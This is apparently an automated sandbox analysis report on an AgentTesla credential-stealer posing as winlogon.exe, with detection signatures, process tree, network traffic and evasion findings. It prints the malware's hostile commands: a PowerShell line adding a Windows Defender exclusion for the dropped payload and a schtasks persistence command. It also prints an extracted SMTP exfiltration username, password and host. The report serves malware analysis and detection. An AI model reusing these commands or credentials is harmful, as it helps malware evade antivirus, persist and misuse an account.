
Windows Analysis Report winlogon.exe

Overview

General Information

Sample Name: winlogon.exe
Analysis ID: 532921
MD5: 629f5bb8b5ee75e90c393ad9d96a1772
SHA1: b09925a7163bef858657a1b39146fe27abb01f99
SHA256: 15637f2d530662c968272c1e6e48ca6a093f0c828edf0cbb5cd32d9af03b3ff5
Tags: AgentTesla, exe

Detection

AgentTesla
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Yara detected AgentTesla
Yara detected AntiVM3
Tries to steal Mail credentials (via file / registry access)
Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Sigma detected: Suspicius Add Task From User AppData Temp
Allocates memory in foreign processes
.NET source code contains potential unpacker
Sigma detected: Powershell Defender Exclusion
.NET source code contains very large array initializations
Adds a directory exclusion to Windows Defender
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Uses schtasks.exe or at.exe to add and modify task schedules
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
Drops PE files
Detected TCP or UDP traffic on non-standard ports
Binary contains a suspicious time stamp
Uses SMTP (mail sending)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Dropped file seen in connection with other malware
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • winlogon.exe (PID: 6768 cmdline: "C:\Users\user\Desktop\winlogon.exe" MD5: 629F5BB8B5EE75E90C393AD9D96A1772)
    • powershell.exe (PID: 6968 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\UlhpAjSuVoTa.exe MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 6584 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • schtasks.exe (PID: 6632 cmdline: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\UlhpAjSuVoTa" /XML "C:\Users\user\AppData\Local\Temp\tmpD7F1.tmp MD5: 15FF7D8324231381BAD48A052F85DF04)
      • conhost.exe (PID: 5644 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • RegSvcs.exe (PID: 6284 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe MD5: 2867A3817C9245F7CF518524DFD18F28)
  • cleanup

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "Username": "m.melendez@stockmeieir.com", "Password": "aU6sb@#1%Efh", "Host": "smtp.stockmeieir.com"}

Yara Overview

Memory Dumps

Source | Rule | Description | Author
00000006.00000000.673745105.0000000000402000.00000040.00000001.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
00000006.00000000.673745105.0000000000402000.00000040.00000001.sdmp | JoeSecurity_AgentTesla_2 | Yara detected AgentTesla | Joe Security
00000006.00000002.929063872.0000000002901000.00000004.00000001.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
00000006.00000002.929063872.0000000002901000.00000004.00000001.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000006.00000002.928192822.0000000000402000.00000040.00000001.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
(5 of 16 entries shown)

Unpacked PEs

Source | Rule | Description | Author
6.0.RegSvcs.exe.400000.1.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
6.0.RegSvcs.exe.400000.1.unpack | JoeSecurity_AgentTesla_2 | Yara detected AgentTesla | Joe Security
6.2.RegSvcs.exe.400000.0.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
6.2.RegSvcs.exe.400000.0.unpack | JoeSecurity_AgentTesla_2 | Yara detected AgentTesla | Joe Security
0.2.winlogon.exe.2bf1b4c.1.raw.unpack | JoeSecurity_AntiVM_3 | Yara detected AntiVM_3 | Joe Security
(5 of 16 entries shown)

Sigma Overview

System Summary:

Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments
Source: Process started | Author: Oleg Kolesnikov @securonix invrep_de, oscd.community, Florian Roth, Christian Burkard | Data: Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, CommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ParentCommandLine: "C:\Users\user\Desktop\winlogon.exe" , ParentImage: C:\Users\user\Desktop\winlogon.exe, ParentProcessId: 6768, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ProcessId: 6284
Sigma detected: Suspicius Add Task From User AppData Temp
Source: Process started | Author: frack113 | Data: Command: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\UlhpAjSuVoTa" /XML "C:\Users\user\AppData\Local\Temp\tmpD7F1.tmp, CommandLine: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\UlhpAjSuVoTa" /XML "C:\Users\user\AppData\Local\Temp\tmpD7F1.tmp, CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\winlogon.exe" , ParentImage: C:\Users\user\Desktop\winlogon.exe, ParentProcessId: 6768, ProcessCommandLine: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\UlhpAjSuVoTa" /XML "C:\Users\user\AppData\Local\Temp\tmpD7F1.tmp, ProcessId: 6632
Sigma detected: Powershell Defender Exclusion
Source: Process started | Author: Florian Roth | Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\UlhpAjSuVoTa.exe, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\UlhpAjSuVoTa.exe, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\winlogon.exe" , ParentImage: C:\Users\user\Desktop\winlogon.exe, ParentProcessId: 6768, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\UlhpAjSuVoTa.exe, ProcessId: 6968
Sigma detected: Possible Applocker Bypass
Source: Process started | Author: juju4 | Data: Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, CommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ParentCommandLine: "C:\Users\user\Desktop\winlogon.exe" , ParentImage: C:\Users\user\Desktop\winlogon.exe, ParentProcessId: 6768, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ProcessId: 6284
Sigma detected: Non Interactive PowerShell
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\UlhpAjSuVoTa.exe, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\UlhpAjSuVoTa.exe, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\winlogon.exe" , ParentImage: C:\Users\user\Desktop\winlogon.exe, ParentProcessId: 6768, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\UlhpAjSuVoTa.exe, ProcessId: 6968
Sigma detected: T1086 PowerShell Execution
Source: Pipe created | Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) | Data: PipeName: \PSHost.132829465297275895.6968.DefaultAppDomain.powershell

Jbx Signature Overview

AV Detection:

Found malware configuration
Source: 6.0.RegSvcs.exe.400000.4.unpack | Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Username": "m.melendez@stockmeieir.com", "Password": "aU6sb@#1%Efh", "Host": "smtp.stockmeieir.com"}
Multi AV Scanner detection for submitted file
Source: winlogon.exe | Virustotal: Detection: 24%
Source: 6.0.RegSvcs.exe.400000.4.unpack | Avira: Label: TR/Spy.Gen8
Source: 6.0.RegSvcs.exe.400000.3.unpack | Avira: Label: TR/Spy.Gen8
Source: 6.0.RegSvcs.exe.400000.2.unpack | Avira: Label: TR/Spy.Gen8
Source: 6.2.RegSvcs.exe.400000.0.unpack | Avira: Label: TR/Spy.Gen8
Source: 6.0.RegSvcs.exe.400000.0.unpack | Avira: Label: TR/Spy.Gen8
Source: 6.0.RegSvcs.exe.400000.1.unpack | Avira: Label: TR/Spy.Gen8
Source: winlogon.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: winlogon.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.4:49843 -> 208.91.199.224:587
Source: Joe Sandbox View | IP Address: 208.91.199.224 208.91.199.224
Source: global traffic | TCP traffic: 192.168.2.4:49843 -> 208.91.199.224:587
Source: RegSvcs.exe, 00000006.00000002.929063872.0000000002901000.00000004.00000001.sdmp | String found in binary or memory: http://127.0.0.1:HTTP/1.1
Source: RegSvcs.exe, 00000006.00000002.929063872.0000000002901000.00000004.00000001.sdmp | String found in binary or memory: http://DynDns.comDynDNS
Source: winlogon.exe, 00000000.00000002.676484155.0000000002CB3000.00000004.00000001.sdmp, winlogon.exe, 00000000.00000002.676341483.0000000002BD1000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: RegSvcs.exe, 00000006.00000002.929285525.0000000002A52000.00000004.00000001.sdmp | String found in binary or memory: http://smtp.stockmeieir.com
Source: RegSvcs.exe, 00000006.00000002.929285525.0000000002A52000.00000004.00000001.sdmp | String found in binary or memory: http://us2.smtp.mailhostbox.com
Source: RegSvcs.exe, 00000006.00000002.929063872.0000000002901000.00000004.00000001.sdmp | String found in binary or memory: http://wwHpow.com
Source: RegSvcs.exe, 00000006.00000002.929225214.0000000002A03000.00000004.00000001.sdmp, RegSvcs.exe, 00000006.00000002.929273138.0000000002A4C000.00000004.00000001.sdmp | String found in binary or memory: https://Qr1QL48h5BTOb.com
Source: RegSvcs.exe, 00000006.00000002.929145314.00000000029AC000.00000004.00000001.sdmp | String found in binary or memory: https://api.ipify.org%
Source: RegSvcs.exe, 00000006.00000002.929063872.0000000002901000.00000004.00000001.sdmp | String found in binary or memory: https://api.ipify.org%GETMozilla/5.0
Source: winlogon.exe, 00000000.00000002.678289324.0000000003BD9000.00000004.00000001.sdmp, RegSvcs.exe, 00000006.00000000.673745105.0000000000402000.00000040.00000001.sdmp, RegSvcs.exe, 00000006.00000000.672598413.0000000000402000.00000040.00000001.sdmp | String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
Source: RegSvcs.exe, 00000006.00000002.929063872.0000000002901000.00000004.00000001.sdmp | String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha
Source: unknown | DNS traffic detected: queries for: smtp.stockmeieir.com

System Summary:

.NET source code contains very large array initializations
Source: 6.0.RegSvcs.exe.400000.4.unpack, u003cPrivateImplementationDetailsu003eu007bE3375034u002d8665u002d4EC5u002dB8E3u002d408FACBEC3C8u007d/u0032F7D2690u002dA8FCu002d441Eu002dBAC6u002d826EE4BE1AC3.cs | Large array initialization: .cctor: array initializer size 11963
Source: 6.0.RegSvcs.exe.400000.3.unpack, u003cPrivateImplementationDetailsu003eu007bE3375034u002d8665u002d4EC5u002dB8E3u002d408FACBEC3C8u007d/u0032F7D2690u002dA8FCu002d441Eu002dBAC6u002d826EE4BE1AC3.cs | Large array initialization: .cctor: array initializer size 11963
Source: 6.0.RegSvcs.exe.400000.2.unpack, u003cPrivateImplementationDetailsu003eu007bE3375034u002d8665u002d4EC5u002dB8E3u002d408FACBEC3C8u007d/u0032F7D2690u002dA8FCu002d441Eu002dBAC6u002d826EE4BE1AC3.cs | Large array initialization: .cctor: array initializer size 11963
Source: 6.2.RegSvcs.exe.400000.0.unpack, u003cPrivateImplementationDetailsu003eu007bE3375034u002d8665u002d4EC5u002dB8E3u002d408FACBEC3C8u007d/u0032F7D2690u002dA8FCu002d441Eu002dBAC6u002d826EE4BE1AC3.cs | Large array initialization: .cctor: array initializer size 11963
Source: 6.0.RegSvcs.exe.400000.0.unpack, u003cPrivateImplementationDetailsu003eu007bE3375034u002d8665u002d4EC5u002dB8E3u002d408FACBEC3C8u007d/u0032F7D2690u002dA8FCu002d441Eu002dBAC6u002d826EE4BE1AC3.cs | Large array initialization: .cctor: array initializer size 11963
Source: 6.0.RegSvcs.exe.400000.1.unpack, u003cPrivateImplementationDetailsu003eu007bE3375034u002d8665u002d4EC5u002dB8E3u002d408FACBEC3C8u007d/u0032F7D2690u002dA8FCu002d441Eu002dBAC6u002d826EE4BE1AC3.cs | Large array initialization: .cctor: array initializer size 11963
Source: winlogon.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: String function: 05DFBA98 appears 52 times
Source: winlogon.exe, 00000000.00000002.675258722.0000000000846000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenameCancellationCallbackIn.exe4 vs winlogon.exe
Source: winlogon.exe, 00000000.00000002.679999581.0000000005D70000.00000004.00020000.sdmp | Binary or memory string: OriginalFilenameUI.dllF vs winlogon.exe
Source: winlogon.exe, 00000000.00000002.678289324.0000000003BD9000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameOTmdmZgynuRtgcbWTCLvFYfG.exe4 vs winlogon.exe
Source: winlogon.exe, 00000000.00000002.678289324.0000000003BD9000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameUI.dllF vs winlogon.exe
Source: winlogon.exe, 00000000.00000002.679722660.0000000005290000.00000004.00020000.sdmp | Binary or memory string: OriginalFilenameInnerException.dll" vs winlogon.exe
Source: winlogon.exe, 00000000.00000002.676341483.0000000002BD1000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameInnerException.dll" vs winlogon.exe
Source: winlogon.exe, 00000000.00000002.676341483.0000000002BD1000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameOTmdmZgynuRtgcbWTCLvFYfG.exe4 vs winlogon.exe
Source: winlogon.exe | Binary or memory string: OriginalFilenameCancellationCallbackIn.exe4 vs winlogon.exe
Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Roaming\UlhpAjSuVoTa.exe 15637F2D530662C968272C1E6E48CA6A093F0C828EDF0CBB5CD32D9AF03B3FF5
Source: winlogon.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: UlhpAjSuVoTa.exe.0.dr | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: winlogon.exe | Virustotal: Detection: 24%
Source: C:\Users\user\Desktop\winlogon.exe | File read: C:\Users\user\Desktop\winlogon.exe
Source: winlogon.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\winlogon.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown | Process created: C:\Users\user\Desktop\winlogon.exe "C:\Users\user\Desktop\winlogon.exe"
Source: C:\Users\user\Desktop\winlogon.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\UlhpAjSuVoTa.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\winlogon.exe | Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\UlhpAjSuVoTa" /XML "C:\Users\user\AppData\Local\Temp\tmpD7F1.tmp
Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\winlogon.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Source: C:\Users\user\Desktop\winlogon.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\winlogon.exe | File created: C:\Users\user\AppData\Roaming\UlhpAjSuVoTa.exe
Source: C:\Users\user\Desktop\winlogon.exe | File created: C:\Users\user\AppData\Local\Temp\tmpD7F1.tmp
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@9/8@2/2
Source: C:\Users\user\Desktop\winlogon.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\winlogon.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5644:120:WilError_01
Source: C:\Users\user\Desktop\winlogon.exe | Mutant created: \Sessions\1\BaseNamedObjects\kQBjZXFLomKnbRbGT
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6584:120:WilError_01
Source: 6.0.RegSvcs.exe.400000.4.unpack, A/b2.cs | Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 6.0.RegSvcs.exe.400000.3.unpack, A/b2.cs | Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 6.0.RegSvcs.exe.400000.2.unpack, A/b2.cs | Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\Desktop\winlogon.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: winlogon.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: winlogon.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: winlogon.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Data Obfuscation:

.NET source code contains potential unpacker
Source: winlogon.exe, GameSettingsWindow.cs | .Net Code: CF234052 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: UlhpAjSuVoTa.exe.0.dr, GameSettingsWindow.cs | .Net Code: CF234052 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 0.0.winlogon.exe.7d0000.0.unpack, GameSettingsWindow.cs | .Net Code: CF234052 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 0.2.winlogon.exe.7d0000.0.unpack, GameSettingsWindow.cs | .Net Code: CF234052 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: C:\Users\user\Desktop\winlogon.exe | Code function: 0_2_00F5E318 push esp; iretd
Source: C:\Users\user\Desktop\winlogon.exe | Code function: 0_2_00F5D642 pushad ; ret
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00E59742 push 8BFFFFFFh; retf
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_05DFED6B pushfd ; ret
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_05DFECC3 push esp; ret
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_05DFEC7B pushad ; ret
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_05DF2188 push edi; retn 0005h
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_05DF2157 push esi; retn 0005h
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_05DF2147 push ebp; retn 0005h
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_05DF210B push edx; retn 0005h
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_05DF5BF7 pushad ; retn 0005h
Source: winlogon.exe | Static PE information: 0xE54F68FF [Thu Nov 29 14:58:07 2091 UTC]
Source: initial sample | Static PE information: section name: .text entropy: 7.82547153814
Source: C:\Users\user\Desktop\winlogon.exe | File created: C:\Users\user\AppData\Roaming\UlhpAjSuVoTa.exe

                      Boot Survival:

                      barindex
                      Uses schtasks.exe or at.exe to add and modify task schedulesShow sources
                      Source: C:\Users\user\Desktop\winlogon.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\UlhpAjSuVoTa" /XML "C:\Users\user\AppData\Local\Temp\tmpD7F1.tmp
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
                      Source: C:\Users\user\Desktop\winlogon.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion:

                      Yara detected AntiVM3
                      Source: Yara match | File source: 0.2.winlogon.exe.2bf1b4c.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 00000000.00000002.676484155.0000000002CB3000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000002.676341483.0000000002BD1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: Process Memory Space: winlogon.exe PID: 6768, type: MEMORYSTR
                      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                      Source: winlogon.exe, 00000000.00000002.676484155.0000000002CB3000.00000004.00000001.sdmp, winlogon.exe, 00000000.00000002.676341483.0000000002BD1000.00000004.00000001.sdmp | Binary or memory string: SBIEDLL.DLL
                      Source: winlogon.exe, 00000000.00000002.676484155.0000000002CB3000.00000004.00000001.sdmp, winlogon.exe, 00000000.00000002.676341483.0000000002BD1000.00000004.00000001.sdmp | Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
                      Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\Desktop\winlogon.exe TID: 2460 | Thread sleep time: -36574s >= -30000s
                      Source: C:\Users\user\Desktop\winlogon.exe TID: 6912 | Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6344 | Thread sleep time: -7378697629483816s >= -30000s
                      Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
                      Source: C:\Users\user\Desktop\winlogon.exe | Thread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 6184
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2340
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Window / User API: threadDelayed 2210
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Window / User API: threadDelayed 7653
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\winlogon.exe | Process information queried: ProcessInformation
                      Source: C:\Users\user\Desktop\winlogon.exe | Thread delayed: delay time: 36574
                      Source: C:\Users\user\Desktop\winlogon.exe | Thread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 922337203685477
                      Source: winlogon.exe, 00000000.00000002.676341483.0000000002BD1000.00000004.00000001.sdmp | Binary or memory string: VMware SVGA IIBAdd-MpPreference -ExclusionPath "
                      Source: winlogon.exe, 00000000.00000002.676341483.0000000002BD1000.00000004.00000001.sdmp | Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
